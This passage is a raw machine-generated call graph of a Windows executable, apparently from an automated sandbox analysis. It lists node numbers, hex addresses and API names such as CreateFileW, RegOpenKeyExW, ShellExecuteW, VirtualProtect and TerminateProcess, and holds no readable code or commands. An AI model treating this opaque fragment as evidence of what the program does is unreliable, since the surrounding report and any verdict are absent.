97193->97170 97195 918653 97194->97195 97196 91863e 97194->97196 97197 91868e 97195->97197 97201 91867a 97195->97201 97217 90f2c6 20 API calls __dosmaperr 97196->97217 97219 90f2c6 20 API calls __dosmaperr 97197->97219 97200 918643 97218 90f2d9 20 API calls __dosmaperr 97200->97218 97214 918607 97201->97214 97202 918693 97220 90f2d9 20 API calls __dosmaperr 97202->97220 97206 90e64c 97206->97164 97206->97173 97207 91869b 97221 9127ec 26 API calls pre_c_initialization 97207->97221 97209->97163 97210->97164 97211->97179 97212->97191 97213->97193 97222 918585 97214->97222 97216 91862b 97216->97206 97217->97200 97218->97206 97219->97202 97220->97207 97221->97206 97223 918591 CallCatchBlock 97222->97223 97233 915147 EnterCriticalSection 97223->97233 97225 91859f 97226 9185d1 97225->97226 97227 9185c6 97225->97227 97249 90f2d9 20 API calls __dosmaperr 97226->97249 97234 9186ae 97227->97234 97230 9185cc 97250 9185fb LeaveCriticalSection __wsopen_s 97230->97250 97232 9185ee __wsopen_s 97232->97216 97233->97225 97251 9153c4 97234->97251 97236 9186c4 97264 915333 21 API calls 2 library calls 97236->97264 97238 9186be 97238->97236 97241 9153c4 __wsopen_s 26 API calls 97238->97241 97248 9186f6 97238->97248 97239 9153c4 __wsopen_s 26 API calls 97242 918702 CloseHandle 97239->97242 97240 91871c 97243 91873e 97240->97243 97265 90f2a3 20 API calls __dosmaperr 97240->97265 97244 9186ed 97241->97244 97242->97236 97245 91870e GetLastError 97242->97245 97243->97230 97247 9153c4 __wsopen_s 26 API calls 97244->97247 97245->97236 97247->97248 97248->97236 97248->97239 97249->97230 97250->97232 97252 9153d1 97251->97252 97253 9153e6 97251->97253 97254 90f2c6 __dosmaperr 20 API calls 97252->97254 97256 90f2c6 __dosmaperr 20 API calls 97253->97256 97258 91540b 97253->97258 97255 9153d6 97254->97255 97257 90f2d9 __dosmaperr 20 API calls 97255->97257 97259 915416 97256->97259 97261 9153de 97257->97261 97258->97238 97260 90f2d9 __dosmaperr 20 API calls 97259->97260 97262 91541e 97260->97262 97261->97238 97263 9127ec pre_c_initialization 26 API calls 97262->97263 97263->97261 97264->97240 97265->97243 97267 8e9cc2 _wcslen 97266->97267 97268 8ffe0b 22 API calls 97267->97268 97269 8e9cea __fread_nolock 97268->97269 97270 8ffddb 22 API calls 97269->97270 97271 8e9d00 97270->97271 97271->96827 97272 8ef7bf 97273 8efcb6 97272->97273 97274 8ef7d3 97272->97274 97364 8eaceb 23 API calls ISource 97273->97364 97276 8efcc2 97274->97276 97277 8ffddb 22 API calls 97274->97277 97365 8eaceb 23 API calls ISource 97276->97365 97279 8ef7e5 97277->97279 97279->97276 97280 8ef83e 97279->97280 97281 8efd3d 97279->97281 97304 8eed9d ISource 97280->97304 97307 8f1310 97280->97307 97366 951155 22 API calls 97281->97366 97284 8efef7 97284->97304 97368 8ea8c7 22 API calls __fread_nolock 97284->97368 97287 8ffddb 22 API calls 97303 8eec76 ISource 97287->97303 97288 934600 97288->97304 97367 8ea8c7 22 API calls __fread_nolock 97288->97367 97289 934b0b 97370 95359c 82 API calls __wsopen_s 97289->97370 97295 900242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97295->97303 97296 8ea8c7 22 API calls 97296->97303 97297 8efbe3 97299 934bdc 97297->97299 97297->97304 97306 8ef3ae ISource 97297->97306 97298 8ea961 22 API calls 97298->97303 97371 95359c 82 API calls __wsopen_s 97299->97371 97301 9000a3 29 API calls pre_c_initialization 97301->97303 97302 934beb 97372 95359c 82 API calls __wsopen_s 97302->97372 97303->97284 97303->97287 97303->97288 97303->97289 97303->97295 97303->97296 97303->97297 97303->97298 97303->97301 97303->97302 97303->97304 97305 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97303->97305 97303->97306 97362 8f01e0 207 API calls 2 library calls 97303->97362 97363 8f06a0 41 API calls ISource 97303->97363 97305->97303 97306->97304 97369 95359c 82 API calls __wsopen_s 97306->97369 97308 8f1376 97307->97308 97309 8f17b0 97307->97309 97310 936331 97308->97310 97311 8f1390 97308->97311 97494 900242 5 API calls __Init_thread_wait 97309->97494 97314 93633d 97310->97314 97453 96709c 97310->97453 97313 8f1940 9 API calls 97311->97313 97317 8f13a0 97313->97317 97314->97303 97316 8f17ba 97318 8f17fb 97316->97318 97319 8e9cb3 22 API calls 97316->97319 97320 8f1940 9 API calls 97317->97320 97322 936346 97318->97322 97324 8f182c 97318->97324 97327 8f17d4 97319->97327 97321 8f13b6 97320->97321 97321->97318 97323 8f13ec 97321->97323 97499 95359c 82 API calls __wsopen_s 97322->97499 97323->97322 97348 8f1408 __fread_nolock 97323->97348 97496 8eaceb 23 API calls ISource 97324->97496 97495 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97327->97495 97328 8f1839 97497 8fd217 207 API calls 97328->97497 97331 93636e 97500 95359c 82 API calls __wsopen_s 97331->97500 97332 8f152f 97334 9363d1 97332->97334 97335 8f153c 97332->97335 97502 965745 54 API calls _wcslen 97334->97502 97337 8f1940 9 API calls 97335->97337 97338 8f1549 97337->97338 97344 8f1940 9 API calls 97338->97344 97354 8f15c7 ISource 97338->97354 97339 8ffddb 22 API calls 97339->97348 97340 8f1872 97498 8ffaeb 23 API calls 97340->97498 97341 8ffe0b 22 API calls 97341->97348 97342 8f171d 97342->97303 97352 8f1563 97344->97352 97346 8eec40 207 API calls 97346->97348 97347 8f167b ISource 97347->97342 97493 8fce17 22 API calls ISource 97347->97493 97348->97328 97348->97331 97348->97332 97348->97339 97348->97341 97348->97346 97349 9363b2 97348->97349 97348->97354 97501 95359c 82 API calls __wsopen_s 97349->97501 97351 8f1940 9 API calls 97351->97354 97352->97354 97503 8ea8c7 22 API calls __fread_nolock 97352->97503 97354->97340 97354->97347 97354->97351 97373 8e6216 97354->97373 97378 8e6246 97354->97378 97382 96958b 97354->97382 97385 95f0ec 97354->97385 97394 9583da 97354->97394 97397 95744a 97354->97397 97504 95359c 82 API calls __wsopen_s 97354->97504 97362->97303 97363->97303 97364->97276 97365->97281 97366->97304 97367->97304 97368->97304 97369->97304 97370->97304 97371->97302 97372->97304 97374 8e6246 CloseHandle 97373->97374 97375 8e621e 97374->97375 97376 8e6246 CloseHandle 97375->97376 97377 8e622d ISource 97376->97377 97377->97354 97379 8e625f 97378->97379 97380 8e6250 97378->97380 97379->97380 97381 8e6264 CloseHandle 97379->97381 97380->97354 97381->97380 97505 967f59 97382->97505 97384 96959b 97384->97354 97386 8e7510 53 API calls 97385->97386 97387 95f126 97386->97387 97625 8e9e90 97387->97625 97389 95f136 97390 95f15b 97389->97390 97391 8eec40 207 API calls 97389->97391 97393 95f15f 97390->97393 97653 8e9c6e 22 API calls 97390->97653 97391->97390 97393->97354 97671 9598e3 97394->97671 97396 9583ea 97396->97354 97398 957469 97397->97398 97399 957474 97397->97399 97766 8eb567 39 API calls 97398->97766 97403 8ea961 22 API calls 97399->97403 97436 957554 97399->97436 97401 8ffddb 22 API calls 97402 957587 97401->97402 97404 8ffe0b 22 API calls 97402->97404 97405 957495 97403->97405 97407 957598 97404->97407 97406 8ea961 22 API calls 97405->97406 97408 95749e 97406->97408 97409 8e6246 CloseHandle 97407->97409 97410 8e7510 53 API calls 97408->97410 97411 9575a3 97409->97411 97412 9574aa 97410->97412 97413 8ea961 22 API calls 97411->97413 97767 8e525f 22 API calls 97412->97767 97415 9575ab 97413->97415 97417 8e6246 CloseHandle 97415->97417 97416 9574bf 97768 8e6350 97416->97768 97419 9575b2 97417->97419 97421 8e7510 53 API calls 97419->97421 97423 9575be 97421->97423 97422 95754a 97779 8eb567 39 API calls 97422->97779 97425 8e6246 CloseHandle 97423->97425 97428 9575c8 97425->97428 97427 957502 97427->97422 97429 957506 97427->97429 97430 8e5745 5 API calls 97428->97430 97431 8e9cb3 22 API calls 97429->97431 97432 9575e2 97430->97432 97433 957513 97431->97433 97434 9576de GetLastError 97432->97434 97435 9575ea 97432->97435 97778 94d2c1 26 API calls 97433->97778 97438 9576f7 97434->97438 97780 8e53de 27 API calls ISource 97435->97780 97436->97401 97451 9576a4 97436->97451 97440 8e6216 CloseHandle 97438->97440 97440->97451 97441 95751c 97441->97422 97442 9575f8 97781 8e53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97442->97781 97444 957645 97445 8ffddb 22 API calls 97444->97445 97447 957679 97445->97447 97446 9575ff 97446->97444 97448 94ccff 4 API calls 97446->97448 97449 8ea961 22 API calls 97447->97449 97448->97444 97450 957686 97449->97450 97450->97451 97782 94417d 22 API calls __fread_nolock 97450->97782 97451->97354 97454 9670f5 97453->97454 97455 9670db 97453->97455 97795 965689 97454->97795 97806 95359c 82 API calls __wsopen_s 97455->97806 97459 8eec40 206 API calls 97460 967164 97459->97460 97461 9671ff 97460->97461 97464 9670ed 97460->97464 97466 9671a6 97460->97466 97462 967205 97461->97462 97463 967253 97461->97463 97807 951119 22 API calls 97462->97807 97463->97464 97465 8e7510 53 API calls 97463->97465 97464->97314 97467 967265 97465->97467 97471 950acc 22 API calls 97466->97471 97469 8eaec9 22 API calls 97467->97469 97472 967289 CharUpperBuffW 97469->97472 97470 967228 97808 8ea673 22 API calls 97470->97808 97474 9671de 97471->97474 97476 9672a3 97472->97476 97475 8f1310 206 API calls 97474->97475 97475->97464 97478 9672f6 97476->97478 97479 9672aa 97476->97479 97477 967230 97809 8ebf40 207 API calls 2 library calls 97477->97809 97480 8e7510 53 API calls 97478->97480 97802 950acc 97479->97802 97482 9672fe 97480->97482 97810 8fe300 23 API calls 97482->97810 97486 8f1310 206 API calls 97486->97464 97487 967308 97487->97464 97488 8e7510 53 API calls 97487->97488 97489 967323 97488->97489 97811 8ea673 22 API calls 97489->97811 97491 967333 97812 8ebf40 207 API calls 2 library calls 97491->97812 97493->97347 97494->97316 97495->97318 97496->97328 97497->97340 97498->97340 97499->97354 97500->97354 97501->97354 97502->97352 97503->97354 97504->97354 97543 8e7510 97505->97543 97509 968281 97510 96844f 97509->97510 97514 96828f 97509->97514 97607 968ee4 60 API calls 97510->97607 97513 96845e 97513->97514 97515 96846a 97513->97515 97579 967e86 97514->97579 97532 967fd5 ISource 97515->97532 97516 8e7510 53 API calls 97534 968049 97516->97534 97521 9682c8 97594 8ffc70 97521->97594 97524 968302 97601 8e63eb 22 API calls 97524->97601 97525 9682e8 97600 95359c 82 API calls __wsopen_s 97525->97600 97528 9682f3 GetCurrentProcess TerminateProcess 97528->97524 97529 968311 97602 8e6a50 22 API calls 97529->97602 97531 96832a 97542 968352 97531->97542 97603 8f04f0 22 API calls 97531->97603 97532->97384 97534->97509 97534->97516 97534->97532 97598 94417d 22 API calls __fread_nolock 97534->97598 97599 96851d 42 API calls _strftime 97534->97599 97535 9684c5 97535->97532 97537 9684d9 FreeLibrary 97535->97537 97536 968341 97604 968b7b 75 API calls 97536->97604 97537->97532 97542->97535 97605 8f04f0 22 API calls 97542->97605 97606 8eaceb 23 API calls ISource 97542->97606 97608 968b7b 75 API calls 97542->97608 97544 8e7525 97543->97544 97560 8e7522 97543->97560 97545 8e752d 97544->97545 97546 8e755b 97544->97546 97609 9051c6 26 API calls 97545->97609 97548 9250f6 97546->97548 97551 8e756d 97546->97551 97552 92500f 97546->97552 97612 905183 26 API calls 97548->97612 97549 8e753d 97556 8ffddb 22 API calls 97549->97556 97610 8ffb21 51 API calls 97551->97610 97559 8ffe0b 22 API calls 97552->97559 97565 925088 97552->97565 97553 92510e 97553->97553 97557 8e7547 97556->97557 97558 8e9cb3 22 API calls 97557->97558 97558->97560 97561 925058 97559->97561 97560->97532 97566 968cd3 97560->97566 97562 8ffddb 22 API calls 97561->97562 97563 92507f 97562->97563 97564 8e9cb3 22 API calls 97563->97564 97564->97565 97611 8ffb21 51 API calls 97565->97611 97567 8eaec9 22 API calls 97566->97567 97568 968cee CharLowerBuffW 97567->97568 97613 948e54 97568->97613 97572 8ea961 22 API calls 97573 968d2a 97572->97573 97620 8e6d25 22 API calls __fread_nolock 97573->97620 97575 968d3e 97576 8e93b2 22 API calls 97575->97576 97578 968d48 _wcslen 97576->97578 97577 968e5e _wcslen 97577->97534 97578->97577 97621 96851d 42 API calls _strftime 97578->97621 97580 967ea1 97579->97580 97581 967eec 97579->97581 97582 8ffe0b 22 API calls 97580->97582 97585 969096 97581->97585 97583 967ec3 97582->97583 97583->97581 97584 8ffddb 22 API calls 97583->97584 97584->97583 97586 9692ab ISource 97585->97586 97593 9690ba _strcat _wcslen 97585->97593 97586->97521 97587 8eb567 39 API calls 97587->97593 97588 8eb6b5 39 API calls 97588->97593 97589 8eb38f 39 API calls 97589->97593 97590 8e7510 53 API calls 97590->97593 97591 90ea0c 21 API calls ___std_exception_copy 97591->97593 97593->97586 97593->97587 97593->97588 97593->97589 97593->97590 97593->97591 97624 94efae 24 API calls _wcslen 97593->97624 97595 8ffc85 97594->97595 97596 8ffd1d VirtualProtect 97595->97596 97597 8ffceb 97595->97597 97596->97597 97597->97524 97597->97525 97598->97534 97599->97534 97600->97528 97601->97529 97602->97531 97603->97536 97604->97542 97605->97542 97606->97542 97607->97513 97608->97542 97609->97549 97610->97549 97611->97548 97612->97553 97614 948e74 _wcslen 97613->97614 97615 948f63 97614->97615 97616 948ea9 97614->97616 97618 948f68 97614->97618 97615->97572 97615->97578 97616->97615 97622 8fce60 41 API calls 97616->97622 97618->97615 97623 8fce60 41 API calls 97618->97623 97620->97575 97621->97577 97622->97616 97623->97618 97624->97593 97654 8e6270 97625->97654 97627 8e9fd2 97628 8ea4a1 22 API calls 97627->97628 97629 8e9fec 97628->97629 97629->97389 97632 8ea6c3 22 API calls 97651 8e9eb5 97632->97651 97633 92f7c4 97669 9496e2 84 API calls __wsopen_s 97633->97669 97634 92f699 97639 8ffddb 22 API calls 97634->97639 97636 8ea405 97636->97629 97670 9496e2 84 API calls __wsopen_s 97636->97670 97641 92f754 97639->97641 97640 92f7d2 97642 8ea4a1 22 API calls 97640->97642 97644 8ffe0b 22 API calls 97641->97644 97643 92f7e8 97642->97643 97643->97629 97646 8ea12c __fread_nolock 97644->97646 97646->97633 97646->97636 97648 8eaec9 22 API calls 97649 8ea0db CharUpperBuffW 97648->97649 97665 8ea673 22 API calls 97649->97665 97651->97627 97651->97632 97651->97633 97651->97634 97651->97636 97651->97646 97651->97648 97652 8ea4a1 22 API calls 97651->97652 97659 8e4573 41 API calls _wcslen 97651->97659 97660 8ea587 97651->97660 97666 8e48c8 23 API calls 97651->97666 97667 8e49bd 22 API calls __fread_nolock 97651->97667 97668 8ea673 22 API calls 97651->97668 97652->97651 97653->97393 97655 8ffe0b 22 API calls 97654->97655 97656 8e6295 97655->97656 97657 8ffddb 22 API calls 97656->97657 97658 8e62a3 97657->97658 97658->97651 97659->97651 97662 8ea59d 97660->97662 97664 8ea598 __fread_nolock 97660->97664 97661 92f80f 97662->97661 97663 8ffe0b 22 API calls 97662->97663 97663->97664 97664->97651 97665->97651 97666->97651 97667->97651 97668->97651 97669->97640 97670->97629 97672 959902 97671->97672 97673 9599e8 97671->97673 97674 8ffddb 22 API calls 97672->97674 97740 959caa 39 API calls 97673->97740 97676 959909 97674->97676 97677 8ffe0b 22 API calls 97676->97677 97678 95991a 97677->97678 97680 8e6246 CloseHandle 97678->97680 97679 959ac5 97722 951e96 97679->97722 97682 959925 97680->97682 97686 8ea961 22 API calls 97682->97686 97683 9599ca 97683->97396 97684 959acc 97726 94ccff 97684->97726 97685 9599a2 97685->97679 97685->97683 97687 959a33 97685->97687 97688 95992d 97686->97688 97689 8e7510 53 API calls 97687->97689 97690 8e6246 CloseHandle 97688->97690 97693 959a3a 97689->97693 97692 959934 97690->97692 97695 8e7510 53 API calls 97692->97695 97694 959abb 97693->97694 97716 959a6e 97693->97716 97752 94cd57 30 API calls 97694->97752 97696 959940 97695->97696 97698 8e6246 CloseHandle 97696->97698 97701 95994a 97698->97701 97699 8e6270 22 API calls 97702 959a7e 97699->97702 97700 959aa8 97700->97683 97703 8e6246 CloseHandle 97700->97703 97730 8e5745 97701->97730 97705 959a8e 97702->97705 97741 8ea8c7 22 API calls __fread_nolock 97702->97741 97706 959b1e 97703->97706 97742 8e33c6 97705->97742 97710 8e6216 CloseHandle 97706->97710 97710->97683 97711 9599c2 97714 8e6216 CloseHandle 97711->97714 97713 95995d 97738 8e53de 27 API calls ISource 97713->97738 97714->97683 97716->97699 97718 95996b 97739 8e53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97718->97739 97720 959972 97720->97685 97721 94ccff 4 API calls 97720->97721 97721->97685 97723 951ea4 97722->97723 97724 951e9f 97722->97724 97723->97684 97753 950f67 24 API calls __fread_nolock 97724->97753 97727 94cd0e 97726->97727 97728 94cd19 WriteFile 97726->97728 97754 94cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97727->97754 97728->97700 97731 8e575c CreateFileW 97730->97731 97732 924035 97730->97732 97733 8e577b 97731->97733 97732->97733 97734 92403b CreateFileW 97732->97734 97733->97711 97733->97713 97734->97733 97735 924063 97734->97735 97755 8e54c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97735->97755 97737 92406e 97737->97733 97738->97718 97739->97720 97740->97685 97741->97705 97743 8e33dd 97742->97743 97744 9230bb 97742->97744 97756 8e33ee 97743->97756 97745 8ffddb 22 API calls 97744->97745 97748 9230c5 _wcslen 97745->97748 97747 8e33e8 97751 94cd57 30 API calls 97747->97751 97749 8ffe0b 22 API calls 97748->97749 97750 9230fe __fread_nolock 97749->97750 97751->97700 97752->97700 97753->97723 97754->97728 97755->97737 97757 8e33fe _wcslen 97756->97757 97758 92311d 97757->97758 97759 8e3411 97757->97759 97761 8ffddb 22 API calls 97758->97761 97760 8ea587 22 API calls 97759->97760 97762 8e341e __fread_nolock 97760->97762 97763 923127 97761->97763 97762->97747 97764 8ffe0b 22 API calls 97763->97764 97765 923157 __fread_nolock 97764->97765 97766->97399 97767->97416 97769 924a51 97768->97769 97770 8e6362 97768->97770 97793 8e4a88 22 API calls __fread_nolock 97769->97793 97783 8e6373 97770->97783 97773 8e636e 97773->97422 97777 94d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97773->97777 97774 924a5b 97775 924a67 97774->97775 97794 8ea8c7 22 API calls __fread_nolock 97774->97794 97777->97427 97778->97441 97779->97436 97780->97442 97781->97446 97782->97451 97785 8e6382 97783->97785 97789 8e63b6 __fread_nolock 97783->97789 97784 924a82 97787 8ffddb 22 API calls 97784->97787 97785->97784 97786 8e63a9 97785->97786 97785->97789 97788 8ea587 22 API calls 97786->97788 97790 924a91 97787->97790 97788->97789 97789->97773 97791 8ffe0b 22 API calls 97790->97791 97792 924ac5 __fread_nolock 97791->97792 97793->97774 97794->97775 97796 9656a4 97795->97796 97801 9656f2 97795->97801 97797 8ffe0b 22 API calls 97796->97797 97798 9656c6 97797->97798 97799 8ffddb 22 API calls 97798->97799 97798->97801 97813 950a59 22 API calls 97798->97813 97799->97798 97801->97459 97803 950ada 97802->97803 97804 950b13 97802->97804 97803->97804 97805 8ffddb 22 API calls 97803->97805 97804->97486 97805->97804 97806->97464 97807->97470 97808->97477 97809->97464 97810->97487 97811->97491 97812->97464 97813->97798 97814 933a41 97818 9510c0 97814->97818 97816 933a4c 97817 9510c0 53 API calls 97816->97817 97817->97816 97819 9510cd 97818->97819 97825 9510fa 97818->97825 97820 9510fc 97819->97820 97821 951101 97819->97821 97819->97825 97827 9510f4 97819->97827 97830 8ffa11 53 API calls 97820->97830 97823 8e7510 53 API calls 97821->97823 97824 951108 97823->97824 97826 8e6350 22 API calls 97824->97826 97825->97816 97826->97825 97829 8eb270 39 API calls 97827->97829 97829->97825 97830->97821 97831 932a00 97846 8ed7b0 ISource 97831->97846 97832 8edb11 PeekMessageW 97832->97846 97833 8ed807 GetInputState 97833->97832 97833->97846 97835 931cbe TranslateAcceleratorW 97835->97846 97836 8eda04 timeGetTime 97836->97846 97837 8edb8f PeekMessageW 97837->97846 97838 8edb73 TranslateMessage DispatchMessageW 97838->97837 97839 8edbaf Sleep 97857 8edbc0 97839->97857 97840 932b74 Sleep 97840->97857 97841 8fe551 timeGetTime 97841->97857 97842 931dda timeGetTime 97900 8fe300 23 API calls 97842->97900 97845 932c0b GetExitCodeProcess 97849 932c21 WaitForSingleObject 97845->97849 97850 932c37 CloseHandle 97845->97850 97846->97832 97846->97833 97846->97835 97846->97836 97846->97837 97846->97838 97846->97839 97846->97840 97846->97842 97847 8ed9d5 97846->97847 97859 8eec40 207 API calls 97846->97859 97860 8f1310 207 API calls 97846->97860 97863 8edd50 97846->97863 97870 8edfd0 97846->97870 97898 8ebf40 207 API calls 2 library calls 97846->97898 97899 8fedf6 IsDialogMessageW GetClassLongW 97846->97899 97901 953a2a 23 API calls 97846->97901 97902 95359c 82 API calls __wsopen_s 97846->97902 97849->97846 97849->97850 97850->97857 97851 932a31 97851->97847 97852 9729bf GetForegroundWindow 97852->97857 97853 932ca9 Sleep 97853->97846 97857->97841 97857->97845 97857->97846 97857->97847 97857->97851 97857->97852 97857->97853 97903 965658 23 API calls 97857->97903 97904 94e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97857->97904 97905 94d4dc 47 API calls 97857->97905 97859->97846 97860->97846 97864 8edd6f 97863->97864 97865 8edd83 97863->97865 97906 8ed260 207 API calls 2 library calls 97864->97906 97907 95359c 82 API calls __wsopen_s 97865->97907 97867 8edd7a 97867->97846 97869 932f75 97869->97869 97872 8ee010 97870->97872 97871 932f7a 97873 8eec40 207 API calls 97871->97873 97872->97871 97875 8ee075 97872->97875 97874 932f8c 97873->97874 97888 8ee0dc ISource 97874->97888 97911 95359c 82 API calls __wsopen_s 97874->97911 97875->97888 97912 900242 5 API calls __Init_thread_wait 97875->97912 97879 932fca 97881 8ea961 22 API calls 97879->97881 97879->97888 97880 8ea961 22 API calls 97880->97888 97884 932fe4 97881->97884 97913 9000a3 29 API calls __onexit 97884->97913 97887 95359c 82 API calls 97887->97888 97888->97880 97888->97887 97891 8eec40 207 API calls 97888->97891 97894 8f04f0 22 API calls 97888->97894 97895 8ee3e1 97888->97895 97908 8ea8c7 22 API calls __fread_nolock 97888->97908 97909 8ea81b 41 API calls 97888->97909 97910 8fa308 207 API calls 97888->97910 97915 900242 5 API calls __Init_thread_wait 97888->97915 97916 9000a3 29 API calls __onexit 97888->97916 97917 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97888->97917 97918 9647d4 207 API calls 97888->97918 97919 9668c1 207 API calls 97888->97919 97889 932fee 97914 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97889->97914 97891->97888 97894->97888 97895->97846 97898->97846 97899->97846 97900->97846 97901->97846 97902->97846 97903->97857 97904->97857 97905->97857 97906->97867 97907->97869 97908->97888 97909->97888 97910->97888 97911->97888 97912->97879 97913->97889 97914->97888 97915->97888 97916->97888 97917->97888 97918->97888 97919->97888 97920 918402 97925 9181be 97920->97925 97923 91842a 97926 9181ef try_get_first_available_module 97925->97926 97933 918338 97926->97933 97940 908e0b 40 API calls 2 library calls 97926->97940 97928 9183ee 97944 9127ec 26 API calls pre_c_initialization 97928->97944 97930 918343 97930->97923 97937 920984 97930->97937 97932 91838c 97932->97933 97941 908e0b 40 API calls 2 library calls 97932->97941 97933->97930 97943 90f2d9 20 API calls __dosmaperr 97933->97943 97935 9183ab 97935->97933 97942 908e0b 40 API calls 2 library calls 97935->97942 97945 920081 97937->97945 97939 92099f 97939->97923 97940->97932 97941->97935 97942->97933 97943->97928 97944->97930 97948 92008d CallCatchBlock 97945->97948 97946 92009b 98002 90f2d9 20 API calls __dosmaperr 97946->98002 97948->97946 97950 9200d4 97948->97950 97949 9200a0 98003 9127ec 26 API calls pre_c_initialization 97949->98003 97956 92065b 97950->97956 97955 9200aa __wsopen_s 97955->97939 97957 920678 97956->97957 97958 9206a6 97957->97958 97959 92068d 97957->97959 98005 915221 97958->98005 98019 90f2c6 20 API calls __dosmaperr 97959->98019 97962 9206ab 97964 9206b4 97962->97964 97965 9206cb 97962->97965 97963 920692 98020 90f2d9 20 API calls __dosmaperr 97963->98020 98021 90f2c6 20 API calls __dosmaperr 97964->98021 98018 92039a CreateFileW 97965->98018 97969 9206b9 98022 90f2d9 20 API calls __dosmaperr 97969->98022 97971 920781 GetFileType 97972 9207d3 97971->97972 97973 92078c GetLastError 97971->97973 98027 91516a 21 API calls 2 library calls 97972->98027 98025 90f2a3 20 API calls __dosmaperr 97973->98025 97974 920756 GetLastError 98024 90f2a3 20 API calls __dosmaperr 97974->98024 97977 920704 97977->97971 97977->97974 98023 92039a CreateFileW 97977->98023 97978 92079a CloseHandle 97978->97963 97980 9207c3 97978->97980 98026 90f2d9 20 API calls __dosmaperr 97980->98026 97982 920749 97982->97971 97982->97974 97984 9207f4 97985 920840 97984->97985 98028 9205ab 72 API calls 3 library calls 97984->98028 97990 92086d 97985->97990 98029 92014d 72 API calls 4 library calls 97985->98029 97986 9207c8 97986->97963 97989 920866 97989->97990 97991 92087e 97989->97991 97992 9186ae __wsopen_s 29 API calls 97990->97992 97993 9200f8 97991->97993 97994 9208fc CloseHandle 97991->97994 97992->97993 98004 920121 LeaveCriticalSection __wsopen_s 97993->98004 98030 92039a CreateFileW 97994->98030 97996 920927 97997 92095d 97996->97997 97998 920931 GetLastError 97996->97998 97997->97993 98031 90f2a3 20 API calls __dosmaperr 97998->98031 98000 92093d 98032 915333 21 API calls 2 library calls 98000->98032 98002->97949 98003->97955 98004->97955 98006 91522d CallCatchBlock 98005->98006 98033 912f5e EnterCriticalSection 98006->98033 98008 91527b 98034 91532a 98008->98034 98009 915259 98013 915000 __wsopen_s 21 API calls 98009->98013 98010 915234 98010->98008 98010->98009 98015 9152c7 EnterCriticalSection 98010->98015 98012 9152a4 __wsopen_s 98012->97962 98014 91525e 98013->98014 98014->98008 98037 915147 EnterCriticalSection 98014->98037 98015->98008 98016 9152d4 LeaveCriticalSection 98015->98016 98016->98010 98018->97977 98019->97963 98020->97993 98021->97969 98022->97963 98023->97982 98024->97963 98025->97978 98026->97986 98027->97984 98028->97985 98029->97989 98030->97996 98031->98000 98032->97997 98033->98010 98038 912fa6 LeaveCriticalSection 98034->98038 98036 915331 98036->98012 98037->98008 98038->98036 98039 8e105b 98044 8e344d 98039->98044 98041 8e106a 98075 9000a3 29 API calls __onexit 98041->98075 98043 8e1074 98045 8e345d __wsopen_s 98044->98045 98046 8ea961 22 API calls 98045->98046 98047 8e3513 98046->98047 98076 8e3a5a 98047->98076 98049 8e351c 98083 8e3357 98049->98083 98052 8e33c6 22 API calls 98053 8e3535 98052->98053 98054 8e515f 22 API calls 98053->98054 98055 8e3544 98054->98055 98056 8ea961 22 API calls 98055->98056 98057 8e354d 98056->98057 98058 8ea6c3 22 API calls 98057->98058 98059 8e3556 RegOpenKeyExW 98058->98059 98060 923176 RegQueryValueExW 98059->98060 98064 8e3578 98059->98064 98061 923193 98060->98061 98062 92320c RegCloseKey 98060->98062 98063 8ffe0b 22 API calls 98061->98063 98062->98064 98067 92321e _wcslen 98062->98067 98065 9231ac 98063->98065 98064->98041 98066 8e5722 22 API calls 98065->98066 98068 9231b7 RegQueryValueExW 98066->98068 98067->98064 98069 8e4c6d 22 API calls 98067->98069 98073 8e9cb3 22 API calls 98067->98073 98074 8e515f 22 API calls 98067->98074 98070 9231d4 98068->98070 98071 9231ee ISource 98068->98071 98069->98067 98072 8e6b57 22 API calls 98070->98072 98071->98062 98072->98071 98073->98067 98074->98067 98075->98043 98077 921f50 __wsopen_s 98076->98077 98078 8e3a67 GetModuleFileNameW 98077->98078 98079 8e9cb3 22 API calls 98078->98079 98080 8e3a8d 98079->98080 98081 8e3aa2 23 API calls 98080->98081 98082 8e3a97 98081->98082 98082->98049 98084 921f50 __wsopen_s 98083->98084 98085 8e3364 GetFullPathNameW 98084->98085 98086 8e3386 98085->98086 98087 8e6b57 22 API calls 98086->98087 98088 8e33a4 98087->98088 98088->98052 98089 8e1098 98094 8e42de 98089->98094 98093 8e10a7 98095 8ea961 22 API calls 98094->98095 98096 8e42f5 GetVersionExW 98095->98096 98097 8e6b57 22 API calls 98096->98097 98098 8e4342 98097->98098 98099 8e93b2 22 API calls 98098->98099 98111 8e4378 98098->98111 98100 8e436c 98099->98100 98102 8e37a0 22 API calls 98100->98102 98101 8e441b GetCurrentProcess IsWow64Process 98103 8e4437 98101->98103 98102->98111 98104 8e444f LoadLibraryA 98103->98104 98105 923824 GetSystemInfo 98103->98105 98106 8e449c GetSystemInfo 98104->98106 98107 8e4460 GetProcAddress 98104->98107 98109 8e4476 98106->98109 98107->98106 98108 8e4470 GetNativeSystemInfo 98107->98108 98108->98109 98112 8e447a FreeLibrary 98109->98112 98113 8e109d 98109->98113 98110 9237df 98111->98101 98111->98110 98112->98113 98114 9000a3 29 API calls __onexit 98113->98114 98114->98093 98115 922ba5 98116 8e2b25 98115->98116 98117 922baf 98115->98117 98143 8e2b83 7 API calls 98116->98143 98119 8e3a5a 24 API calls 98117->98119 98121 922bb8 98119->98121 98123 8e9cb3 22 API calls 98121->98123 98125 922bc6 98123->98125 98124 8e2b2f 98132 8e2b44 98124->98132 98147 8e3837 98124->98147 98126 922bf5 98125->98126 98127 922bce 98125->98127 98128 8e33c6 22 API calls 98126->98128 98130 8e33c6 22 API calls 98127->98130 98131 922bf1 GetForegroundWindow ShellExecuteW 98128->98131 98133 922bd9 98130->98133 98137 922c26 98131->98137 98135 8e2b5f 98132->98135 98157 8e30f2 Shell_NotifyIconW ___scrt_fastfail 98132->98157 98136 8e6350 22 API calls 98133->98136 98141 8e2b66 SetCurrentDirectoryW 